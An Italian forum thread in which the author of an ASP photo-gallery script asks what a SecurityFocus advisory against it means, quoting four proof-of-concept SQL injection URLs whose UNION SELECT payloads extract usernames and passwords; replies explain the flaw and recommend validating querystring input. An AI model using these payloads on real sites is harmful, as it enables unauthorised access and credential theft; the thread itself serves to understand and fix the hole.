Sicurezza script ASP

[TeoB]

Salve a tutti, sono capitato su questa pagina che parla dello mio script asp per le gallerie fotografiche.

http://www.securityfocus.com/bid/27262/info

A quanto pare non è giudicato molto sicuro, ma non riesco a capire in che senso...cliccando su exploit dice:

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1

http://www.example.com/thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like

http://www.example.com/thumbricerca.asp?ricerca=-1'union select user as name,1,pass as descrizione from stuff where 1 lik

http://www.example.com/thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1

Qualcuno potrebbe spiegarmi cosa vuol dire?

[Roby_72]

Vuol dire che passando altri parametri oltre o escludendo l'id in modo fraudolento si potrebbe riuscire a carpire user e password di eventuali aree riservate presenti.
Non ho provato.

Roby

[TeoB]

'stica Speriamo non ci provi nessuno.

Ma è un problema risolvibile?

edit: ho fatto una prova, sul mio sito non puó funzionare perchè ho uno script leggermente diverso, peró su tutti gli altri siti funziona eccome...

Come posso risolvere? Il tutto sta nel passare la pass in un altro modo, vero?

[Roby_72]

Il tutto sta nel controllare che ciò che viene passato per querystring sia sensato!

Roby

[optime]

prova a leggere qui http://www.15seconds.com/issue/020701.htm

[Roby_72]

Originariamente inviato da optime
prova a leggere qui http://www.15seconds.com/issue/020701.htm

Lo stavo appunto cercando all'interno del mio marasma ma non lo trovavo...

Roby

[TeoB]

Grazie mille, dopo lo guardo